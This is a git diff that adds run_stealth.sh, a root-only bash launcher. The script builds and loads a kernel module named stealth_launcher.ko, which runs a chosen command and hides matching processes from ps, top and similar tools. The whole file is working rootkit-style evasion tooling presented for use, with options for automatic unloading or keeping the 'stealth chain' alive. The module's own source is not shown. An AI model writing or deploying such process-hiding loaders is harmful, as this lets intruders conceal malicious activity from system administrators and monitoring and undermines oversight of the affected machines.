diff options
Diffstat (limited to 'run_stealth.sh')
| -rwxr-xr-x | run_stealth.sh | 122 |
1 files changed, 122 insertions, 0 deletions
diff --git a/run_stealth.sh b/run_stealth.sh new file mode 100755 index 0000000..04bd5bf --- /dev/null +++ b/run_stealth.sh @@ -0,0 +1,122 @@ +#!/bin/bash + +# run_stealth.sh - Helper script to run commands with process hiding +# Usage: ./run_stealth.sh -c "sleep 120" -p "sleep" + +# Default values +STEALTH_CMD="" +HIDE_PATTERN="" +AUTO_CLEANUP=1 + +# Parse command line arguments +while [[ $# -gt 0 ]]; do + case $1 in + -c|--command) + STEALTH_CMD="$2" + shift 2 + ;; + -p|--pattern) + HIDE_PATTERN="$2" + shift 2 + ;; + -a|--auto-cleanup) + AUTO_CLEANUP="$2" + shift 2 + ;; + *) + # For backward compatibility + if [ -z "$STEALTH_CMD" ]; then + STEALTH_CMD="$1" + fi + shift + ;; + esac +done + +# Check if any command was provided +if [ -z "$STEALTH_CMD" ]; then + echo "Usage: $0 -c \"command to run in stealth mode\" [-p \"pattern to hide\"] [-a 0|1]" + echo "Example: $0 -c \"sleep 120\" -p \"sleep\"" + echo " -a 1 Enable auto-cleanup (default)" + echo " -a 0 Disable auto-cleanup" + echo " or: $0 \"command to run in stealth mode\" (backward compatibility)" + exit 1 +fi + +# Check if user is root +if [ "$EUID" -ne 0 ]; then + echo "This script must be run as root" + exit 1 +fi + +# Build the kernel module if it's not already built +if [ ! -f "stealth_launcher.ko" ]; then + echo "Building kernel module..." + make stealth_launcher.ko >/dev/null 2>&1 + if [ $? -ne 0 ]; then + echo "Failed to build the kernel module" + exit 1 + fi +fi + +# Remove any existing module first +if lsmod | grep -q "stealth_launcher"; then + echo "Removing existing stealth_launcher module..." + rmmod stealth_launcher >/dev/null 2>&1 +fi + +# Prepare module parameters (with proper escaping) +MODULE_PARAMS="" + +# Escape special characters in the command +ESCAPED_CMD=$(echo "$STEALTH_CMD" | sed 's/"/\\"/g') +MODULE_PARAMS="target_cmd=\"$ESCAPED_CMD\"" + +# Add hide pattern if specified +if [ -n "$HIDE_PATTERN" ]; then + ESCAPED_PATTERN=$(echo "$HIDE_PATTERN" | sed 's/"/\\"/g') + MODULE_PARAMS="$MODULE_PARAMS hide_pattern=\"$ESCAPED_PATTERN\"" +fi + +# Add auto-cleanup parameter +MODULE_PARAMS="$MODULE_PARAMS auto_cleanup=$AUTO_CLEANUP" + +# Hide module and insmod process to avoid showing in ps/top +if ! echo 1 > /dev/null; then + echo "Hiding module loader processes disabled" +fi + +# Load the kernel module with the parameters +echo "Loading stealth_launcher with parameters: $MODULE_PARAMS" +echo "Auto-cleanup mode: $([ "$AUTO_CLEANUP" -eq 1 ] && echo "enabled" || echo "disabled")" +insmod stealth_launcher.ko $MODULE_PARAMS >/dev/null 2>&1 +RESULT=$? + +if [ $RESULT -eq 0 ]; then + echo "Command launched in stealth mode" + echo "Process will be hidden from ps, top, and other tools" + + if [ "$AUTO_CLEANUP" -eq 1 ]; then + echo "Module will automatically unload when process completes" + else + echo "To unhide processes, run: rmmod stealth_launcher" + fi + + # If auto-cleanup is disabled, we need to keep the script running + if [ "$AUTO_CLEANUP" -eq 0 ]; then + # Wait quietly to keep stealth script running + sleep 1 + + # In background mode + exec > /dev/null 2>&1 + + # Keep script running to maintain stealth chain + tail -f /dev/null + fi +else + echo "Failed to load module. Check kernel log for details." + echo "Try dmesg | tail" + exit 1 +fi + +exit 0
\ No newline at end of file |